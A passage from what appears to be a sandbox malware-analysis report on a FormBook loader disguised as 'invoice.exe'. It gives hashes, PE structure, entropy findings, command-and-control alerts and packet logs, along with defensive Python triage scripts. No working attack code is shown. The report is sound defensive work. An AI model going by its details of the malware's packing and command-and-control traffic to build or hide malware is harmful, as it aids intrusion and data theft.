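    '2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\f1d8480152e0da9a60ad49c6d16a3b6d\\System.Core.ni.dll",0\r\n'
    '3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\8d67d92724ba494b6c7fd089d6f25b48\\System.Configuration.ni.dll",0\r\n'
)

# Public key tokens Microsoft signs the framework assemblies with.
MICROSOFT_KEY_TOKENS = {"b77a5c561934e089", "b03f5f7f11d50a3a", "31bf3856ad364e35"}


def parse_assembly_name(full_name: str) -> dict:
    """Split 'Name, Version=..., Culture=..., PublicKeyToken=...' into a dict."""
    parts = [p.strip() for p in full_name.split(",")]
    info = {"name": parts[0]}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        info[key.lower()] = value
    return info


def parse_usage_log(text: str) -> list:
    """Return one dict per record. Record kinds as inferred from the rows (assumption):
    1 = runtime flag, 2 = assembly bound from IL, 3 = assembly bound via the native
    image whose path is the third field."""
    records = []
    for row in csv.reader(io.StringIO(text, newline="")):
        if not row:
            continue
        kind = int(row[0])
        if kind == 1:
            records.append({"kind": kind, "key": row[1], "value": row[2]})
            continue
        rec = {"kind": kind, "native_image": row[2] if kind == 3 else None}
        rec.update(parse_assembly_name(row[1]))
        records.append(rec)
    return records


def bound_assemblies(text: str) -> list:
    """Simple names of every assembly the process bound, in binding order."""
    return [r["name"] for r in parse_usage_log(text) if r["kind"] in (2, 3)]


def native_images(text: str) -> dict:
    """Assembly name -> NGEN image path, for bindings served from a native image."""
    return {r["name"]: r["native_image"] for r in parse_usage_log(text) if r.get("native_image")}


def non_framework_bindings(text: str) -> list:
    """Bindings not signed with a Microsoft framework key. A loader's own helper or
    payload assembly would show up here; an empty list means only the framework was bound."""
    return [r["name"] for r in parse_usage_log(text)
            if r["kind"] in (2, 3) and r.get("publickeytoken") not in MICROSOFT_KEY_TOKENS]


if __name__ == "__main__":
    print("bound:", ", ".join(bound_assemblies(USAGE_LOG)))
    print("native images:", len(native_images(USAGE_LOG)))
    print("non-framework:", non_framework_bindings(USAGE_LOG) or "none")
```

For this sample the non-framework list is empty, which agrees with the behaviour in the signatures: the VB.NET stage does not load a second managed assembly from disk, it unpacks and injects native FormBook code instead.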

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):7.214342330666735
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                            File name:invoice.exe
                                                                            File size:894464
                                                                            MD5:492017e064cab97dd8ea27abd3e5cfca
                                                                            SHA1:a3addbdea8245b2e16c6ef551755b9d0e66e8e2b
                                                                            SHA256:524306af2db603c7db95227603c3014b67c27cfb2f88d12de2a599ece24575e2
                                                                            SHA512:66d5180a58dfaf4f1971480090197115c76af46e46098e6b33ec2d6f30d63b40e45f13f29e41b7b19cb8dc3a0dd24c1846fb45009c6f10c5419d30fcf6208a13
                                                                            SSDEEP:12288:/eGIIK2eESBAcIRUpDrV5F4pO9q7d36dQc8fZVa0RdYrLST8BHVlnwC5IKUaE+:/e5IV6AVUF5Ipb/cmES4VlnFI/
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n`..............P..^...F......~|... ........@.. ....................................@................................

                                                                            File Icon

                                                                            Icon Hash:e8d4ae708e8ec461

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4a7c7e
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x606EACE1 [Thu Apr 8 07:12:33 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:v4.0.30319
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
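Three of the values above identify this as a managed executable before any unpacking: the CLR version, the import hash, and the entry point. A 32-bit .NET assembly's native entry point is a six-byte stub, `FF 25` followed by the absolute address of an IAT slot, that jumps to `mscoree.dll!_CorExeMain` (the `jmp dword ptr [00402000h]` in the Entrypoint Preview below, with the zeros after it being padding). Such a binary normally imports nothing else natively, so its import hash is the same for every .NET executable, f34d5f2d4577ed6d9ceec516c1f5a744, and is useless for clustering; pivot on the managed code or the typelib GUID instead. The script below is an added example in Python, not part of the report, and does not need the sample: it works on a constructed stand-in for the entry bytes and import table that mirrors the values above (assumption: the single import mscoree.dll!_CorExeMain with its IAT slot at 0x402000, as is standard for 32-bit .NET), decodes the stub, and recomputes the import hash the way pefile does.

```python
import hashlib
import struct

# Values from the Static PE Info and Entrypoint Preview on this page.
IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x4A7C7E
IAT_SLOT_VA = 0x402000          # operand of 'jmp dword ptr [00402000h]'

# Constructed stand-in for the bytes at the entry point: FF 25 imm32, then zero padding.
ENTRY_BYTES = b"\xff\x25" + struct.pack("<I", IAT_SLOT_VA) + b"\x00" * 8

# Constructed stand-in for the import table. Assumption: like any ordinary 32-bit .NET
# executable, the only native import is mscoree.dll!_CorExeMain, thunked at 0x402000.
IMPORTS = [("mscoree.dll", "_CorExeMain")]
IAT = {IAT_SLOT_VA: IMPORTS[0]}

# Import hash every .NET executable with that single import produces (matches the page).
DOTNET_IMPHASH = "f34d5f2d4577ed6d9ceec516c1f5a744"


def entry_rva(entry_va: int = ENTRY_POINT_VA, image_base: int = IMAGE_BASE) -> int:
    """The page lists the entry point as a VA; the PE header stores it as an RVA."""
    return entry_va - image_base


def decode_indirect_jmp(code: bytes):
    """Return the absolute address read by 'FF 25 imm32' (jmp dword ptr [imm32]), else None."""
    if len(code) < 6 or code[:2] != b"\xff\x25":
        return None
    return struct.unpack_from("<I", code, 2)[0]


def resolve_entry_stub(code: bytes, iat: dict):
    """Name the import the entry stub jumps through, e.g. 'mscoree.dll!_CorExeMain'."""
    slot = decode_indirect_jmp(code)
    if slot is None or slot not in iat:
        return None
    dll, func = iat[slot]
    return f"{dll}!{func}"


def imphash(imports) -> str:
    """Import hash as pefile computes it: one 'lib.func' entry per import, lower-cased,
    library extension stripped, comma-joined, MD5-hashed."""
    entries = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        entries.append(f"{lib}.{func.lower()}")
    return hashlib.md5(",".join(entries).encode("ascii")).hexdigest()


def is_standard_managed_entry(code: bytes, iat: dict, imports) -> bool:
    """True when the entry stub and import set are the plain .NET loader pattern:
    nothing native worth hashing or disassembling, analyse the managed code instead."""
    return (resolve_entry_stub(code, iat) == "mscoree.dll!_CorExeMain"
            and imphash(imports) == DOTNET_IMPHASH)


if __name__ == "__main__":
    print(f"entry RVA      : {entry_rva():#x}")
    print(f"entry stub     : {resolve_entry_stub(ENTRY_BYTES, IAT)}")
    print(f"imphash        : {imphash(IMPORTS)}")
    print(f"standard .NET  : {is_standard_managed_entry(ENTRY_BYTES, IAT, IMPORTS)}")
```

Against a real file the same checks are done with pefile (`pe.OPTIONAL_HEADER.AddressOfEntryPoint`, `pe.get_data(rva, 6)`, `pe.DIRECTORY_ENTRY_IMPORT`, `pe.get_imphash()`), which is where the hashing rule in `imphash` comes from.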

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated for the rest of the preview: after the six-byte jmp stub the section is zero padding, and each 00 00 byte pair disassembles as this instruction)
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa7c2c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa8000 | 0x3422c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xde000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa5c84 | 0xa5e00 | False | 0.789592360588 | data | 7.55515603565 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa8000 | 0x3422c | 0x34400 | False | 0.389877392344 | data | 5.76163363059 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xde000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

The .text section holds the CIL and, at 7.56 bits per byte, is far denser than compiled .NET code normally is (plain CIL usually stays well under 7): expect a compressed or encrypted second stage stored inside it, which fits the injection and process-hollowing signatures listed in the overview.

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xa8220 | 0x521e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | -
RT_ICON | 0xad450 | 0x6f5a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | -
RT_ICON | 0xb43bc | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | - | -
RT_ICON | 0xc4bf4 | 0x94a8 | data | - | -
RT_ICON | 0xce0ac | 0x5488 | data | - | -
RT_ICON | 0xd3544 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 15794175, next used block 4294902528 | - | -
RT_ICON | 0xd777c | 0x25a8 | data | - | -
RT_ICON | 0xd9d34 | 0x10a8 | data | - | -
RT_ICON | 0xdadec | 0x988 | data | - | -
RT_ICON | 0xdb784 | 0x468 | GLS_BINARY_LSB_FIRST | - | -
RT_GROUP_ICON | 0xdbbfc | 0x92 | data | - | -
RT_VERSION | 0xdbca0 | 0x38a | data | - | -
RT_MANIFEST | 0xdc03c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | - | -

The Type column is a libmagic guess on the raw resource bytes. The "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" labels are false matches on uncompressed icon bitmaps (DIBs), not embedded files: 0x10828 bytes is exactly a 40-byte BITMAPINFOHEADER plus a 128x128 32-bpp pixel array and its 1-bit AND mask, and 0x94a8 bytes is the same layout at 96x96.

Imports

DLL | Import
mscoree.dll | _CorExeMain

mscoree.dll!_CorExeMain is the only native import, and the COM_DESCRIPTOR (CLR header) data directory is populated, so this is a managed (.NET) executable: the native entry point is just the CLR bootstrap stub, and the program logic is CIL in .text rather than native code.
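The Data Directories, Sections and Imports tables above give the raw facts (a populated COM_DESCRIPTOR directory, a single mscoree.dll import, a .text section with entropy 7.56). The script below is an added example, not Joe Sandbox code and not part of this report, showing how to pull those same indicators out of any PE with the Python standard library alone: it walks the headers, computes per-section entropy and flags a managed module whose executable section is dense enough to be an encrypted payload. The PE image it runs on is constructed inline by build_demo_pe (a minimal PE32 with a CLR header and pseudo-random .text), not the analysed sample; the 7.0 entropy threshold is a triage heuristic, not a value from the report.

```python
import hashlib
import math
import struct
from collections import Counter

# Indices and flags from the PE/COFF specification.
IMAGE_DIRECTORY_ENTRY_IAT, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 12, 14   # 14 = CLR header, managed images only
IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000020, 0x00000040
IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ = 0x02000000, 0x20000000, 0x40000000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(image: bytes) -> dict:
    """Walk DOS header -> COFF header -> optional header; return data directories and sections."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", image, opt_off)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dd_off = opt_off + (96 if magic == 0x10B else 112)         # PE32 vs PE32+ layout
    num_dd = struct.unpack_from("<I", image, dd_off - 4)[0]     # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", image, dd_off + 8 * i) for i in range(num_dd)]
    sections, sec_off = [], opt_off + opt_size
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, sec_off + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(image[raw_ptr:raw_ptr + raw_size])})
    return {"machine": machine, "dirs": dirs, "sections": sections}


def section_for_rva(sections: list, rva: int):
    """Name of the section containing an RVA (the report's 'Is in Section' column)."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def triage(image: bytes, entropy_threshold: float = 7.0) -> dict:
    pe = parse_pe(image)
    dirs = pe["dirs"]
    clr_rva = dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR][0] if len(dirs) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR else 0
    return {
        "managed": clr_rva != 0,
        "clr_header_in": section_for_rva(pe["sections"], clr_rva) if clr_rva else None,
        "sections": {s["name"]: round(s["entropy"], 2) for s in pe["sections"]},
        # Plain code (native or CIL) rarely exceeds ~6.5 bits/byte; an executable section
        # near 8 is almost always compressed or encrypted data waiting for an unpacker.
        "high_entropy_code": [s["name"] for s in pe["sections"]
                              if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["entropy"] >= entropy_threshold],
    }


def _filler(n: int, seed: bytes = b"demo") -> bytes:
    """Deterministic high-entropy bytes (chained SHA-256) standing in for an encrypted payload."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_demo_pe() -> bytes:
    """Constructed test image, NOT the analysed sample: PE32 with a CLR header in .text,
    .text filled with pseudo-random bytes and a near-empty .reloc section."""
    headers_size = 0x200
    secs = [  # (name, RVA, raw bytes, characteristics); raw sizes are multiples of FileAlignment 0x200
        (b".text", 0x2000, _filler(0x1000), IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".reloc", 0x3000, b"\x00\x20\x00\x00\x0c\x00\x00\x00\x08\x30\x0c\x30".ljust(0x200, b"\0"),
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ),
    ]
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_IAT] = (0x2000, 0x8)
    dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2008, 0x48)
    # IMAGE_OPTIONAL_HEADER32 in field order: magic/linker, code+data sizes, entry point, code/data base,
    # ImageBase, SectionAlignment, FileAlignment, six version words, reserved, SizeOfImage, SizeOfHeaders,
    # checksum, Subsystem, DllCharacteristics, stack/heap sizes, LoaderFlags, NumberOfRvaAndSizes.
    opt = struct.pack("<HBB9I6H4IHH4I2I", 0x10B, 48, 0, 0x1000, 0x200, 0, 0x2000, 0x2000, 0x3000,
                      0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x4000, headers_size, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, len(dirs))
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x0102)  # i386, EXECUTABLE|32BIT
    sec_hdrs, body, raw_ptr = b"", b"", headers_size
    for name, va, raw, chars in secs:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body, raw_ptr = body + raw, raw_ptr + len(raw)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)               # e_lfanew -> PE signature
    return (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(headers_size, b"\0") + body
```

Run `triage(build_demo_pe())` to see the dictionary, or pass `open("invoice.exe", "rb").read()` from a sample you hold to reproduce the report's Is in Section and Entropy columns. The parser deliberately trusts nothing beyond the two magic values, so feed it truncated or malformed files only inside a try block; a real triage pipeline should also bound num_dd and nsec before looping over them.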

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2016 Computer City
Assembly Version | 1.12.0.2
InternalName | CharTypeInfo.exe
FileVersion | 1.12.0.2
CompanyName | Computer City
LegalTrademarks | -
Comments | -
ProductName | UnmanagedAccessor
ProductVersion | 1.12.0.2
FileDescription | UnmanagedAccessor
OriginalFilename | CharTypeInfo.exe

OriginalFilename and InternalName (CharTypeInfo.exe) do not match the name the sample was delivered under (invoice.exe), and none of the company or product strings relate to an invoice; a version resource that contradicts the file name is a cheap static triage signal on its own.

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-12:04:21.809030 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 184.168.131.241
04/08/21-12:04:21.809030 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 184.168.131.241
04/08/21-12:04:21.809030 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 184.168.131.241
04/08/21-12:04:59.252139 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 208.91.197.91
04/08/21-12:04:59.252139 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 208.91.197.91
04/08/21-12:04:59.252139 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.5 | 208.91.197.91
04/08/21-12:05:07.034640 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.5 | 8.8.8.8
04/08/21-12:05:08.358998 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.5 | 8.8.8.8
04/08/21-12:05:18.088414 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49732 | 80 | 192.168.2.5 | 177.55.108.130
04/08/21-12:05:18.088414 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49732 | 80 | 192.168.2.5 | 177.55.108.130
04/08/21-12:05:18.088414 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49732 | 80 | 192.168.2.5 | 177.55.108.130

The three ET signatures fire together on the same HTTP GET each time; each alert timestamp equals the third client packet of flows 49717, 49725 and 49732 in the TCP Packets table, i.e. the request sent immediately after the handshake. The two ICMP alerts are not malware traffic: they are the analysis host rejecting DNS replies from 8.8.8.8 to source port 50394 that arrived (12:05:07.03 and 12:05:08.36) after the resolver had already re-sent that query three times and given up on the socket (see the UDP Packets table).

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 12:04:21.632926941 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:21.808682919 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:21.808800936 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:21.809030056 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:21.984464884 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:22.028017998 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:22.028047085 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:22.028240919 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:22.028343916 CEST | 49717 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:04:22.203593016 CEST | 80 | 49717 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:04:32.389282942 CEST | 49718 | 80 | 192.168.2.5 | 35.156.117.131
Apr 8, 2021 12:04:32.407913923 CEST | 80 | 49718 | 35.156.117.131 | 192.168.2.5
Apr 8, 2021 12:04:32.408046007 CEST | 49718 | 80 | 192.168.2.5 | 35.156.117.131
Apr 8, 2021 12:04:32.408296108 CEST | 49718 | 80 | 192.168.2.5 | 35.156.117.131
Apr 8, 2021 12:04:32.426136971 CEST | 80 | 49718 | 35.156.117.131 | 192.168.2.5
Apr 8, 2021 12:04:32.428894997 CEST | 80 | 49718 | 35.156.117.131 | 192.168.2.5
Apr 8, 2021 12:04:32.429075003 CEST | 49718 | 80 | 192.168.2.5 | 35.156.117.131
Apr 8, 2021 12:04:32.429214954 CEST | 49718 | 80 | 192.168.2.5 | 35.156.117.131
Apr 8, 2021 12:04:32.447406054 CEST | 80 | 49718 | 35.156.117.131 | 192.168.2.5
Apr 8, 2021 12:04:37.530929089 CEST | 49719 | 80 | 192.168.2.5 | 2.57.90.16
Apr 8, 2021 12:04:37.571005106 CEST | 80 | 49719 | 2.57.90.16 | 192.168.2.5
Apr 8, 2021 12:04:37.571151972 CEST | 49719 | 80 | 192.168.2.5 | 2.57.90.16
Apr 8, 2021 12:04:37.571713924 CEST | 49719 | 80 | 192.168.2.5 | 2.57.90.16
Apr 8, 2021 12:04:37.611814976 CEST | 80 | 49719 | 2.57.90.16 | 192.168.2.5
Apr 8, 2021 12:04:37.611836910 CEST | 80 | 49719 | 2.57.90.16 | 192.168.2.5
Apr 8, 2021 12:04:37.611850023 CEST | 80 | 49719 | 2.57.90.16 | 192.168.2.5
Apr 8, 2021 12:04:37.612085104 CEST | 49719 | 80 | 192.168.2.5 | 2.57.90.16
Apr 8, 2021 12:04:37.612297058 CEST | 49719 | 80 | 192.168.2.5 | 2.57.90.16
Apr 8, 2021 12:04:37.652245045 CEST | 80 | 49719 | 2.57.90.16 | 192.168.2.5
Apr 8, 2021 12:04:59.106825113 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.251840115 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:04:59.251971006 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.252139091 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.397062063 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:04:59.498363972 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:04:59.498404980 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:04:59.498425007 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:04:59.498682022 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.498739004 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.531753063 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:04:59.531820059 CEST | 49725 | 80 | 192.168.2.5 | 208.91.197.91
Apr 8, 2021 12:04:59.644556999 CEST | 80 | 49725 | 208.91.197.91 | 192.168.2.5
Apr 8, 2021 12:05:11.767712116 CEST | 49731 | 80 | 192.168.2.5 | 74.208.236.64
Apr 8, 2021 12:05:11.899678946 CEST | 80 | 49731 | 74.208.236.64 | 192.168.2.5
Apr 8, 2021 12:05:11.899977922 CEST | 49731 | 80 | 192.168.2.5 | 74.208.236.64
Apr 8, 2021 12:05:11.900079012 CEST | 49731 | 80 | 192.168.2.5 | 74.208.236.64
Apr 8, 2021 12:05:12.031223059 CEST | 80 | 49731 | 74.208.236.64 | 192.168.2.5
Apr 8, 2021 12:05:12.034537077 CEST | 80 | 49731 | 74.208.236.64 | 192.168.2.5
Apr 8, 2021 12:05:12.034565926 CEST | 80 | 49731 | 74.208.236.64 | 192.168.2.5
Apr 8, 2021 12:05:12.034796953 CEST | 49731 | 80 | 192.168.2.5 | 74.208.236.64
Apr 8, 2021 12:05:12.034859896 CEST | 49731 | 80 | 192.168.2.5 | 74.208.236.64
Apr 8, 2021 12:05:12.165515900 CEST | 80 | 49731 | 74.208.236.64 | 192.168.2.5
Apr 8, 2021 12:05:17.881434917 CEST | 49732 | 80 | 192.168.2.5 | 177.55.108.130
Apr 8, 2021 12:05:18.087061882 CEST | 80 | 49732 | 177.55.108.130 | 192.168.2.5
Apr 8, 2021 12:05:18.087527037 CEST | 49732 | 80 | 192.168.2.5 | 177.55.108.130
Apr 8, 2021 12:05:18.088413954 CEST | 49732 | 80 | 192.168.2.5 | 177.55.108.130
Apr 8, 2021 12:05:18.291481972 CEST | 80 | 49732 | 177.55.108.130 | 192.168.2.5
Apr 8, 2021 12:05:18.292332888 CEST | 80 | 49732 | 177.55.108.130 | 192.168.2.5
Apr 8, 2021 12:05:18.292355061 CEST | 80 | 49732 | 177.55.108.130 | 192.168.2.5
Apr 8, 2021 12:05:18.292543888 CEST | 49732 | 80 | 192.168.2.5 | 177.55.108.130
Apr 8, 2021 12:05:18.292608976 CEST | 49732 | 80 | 192.168.2.5 | 177.55.108.130
Apr 8, 2021 12:05:18.495742083 CEST | 80 | 49732 | 177.55.108.130 | 192.168.2.5
Apr 8, 2021 12:05:23.338290930 CEST | 49734 | 80 | 192.168.2.5 | 192.0.78.24
Apr 8, 2021 12:05:23.354049921 CEST | 80 | 49734 | 192.0.78.24 | 192.168.2.5
Apr 8, 2021 12:05:23.354183912 CEST | 49734 | 80 | 192.168.2.5 | 192.0.78.24
Apr 8, 2021 12:05:23.354604006 CEST | 49734 | 80 | 192.168.2.5 | 192.0.78.24
Apr 8, 2021 12:05:23.370249987 CEST | 80 | 49734 | 192.0.78.24 | 192.168.2.5
Apr 8, 2021 12:05:23.483477116 CEST | 80 | 49734 | 192.0.78.24 | 192.168.2.5
Apr 8, 2021 12:05:23.483500957 CEST | 80 | 49734 | 192.0.78.24 | 192.168.2.5
Apr 8, 2021 12:05:23.483649969 CEST | 49734 | 80 | 192.168.2.5 | 192.0.78.24
Apr 8, 2021 12:05:23.483750105 CEST | 49734 | 80 | 192.168.2.5 | 192.0.78.24
Apr 8, 2021 12:05:23.499483109 CEST | 80 | 49734 | 192.0.78.24 | 192.168.2.5
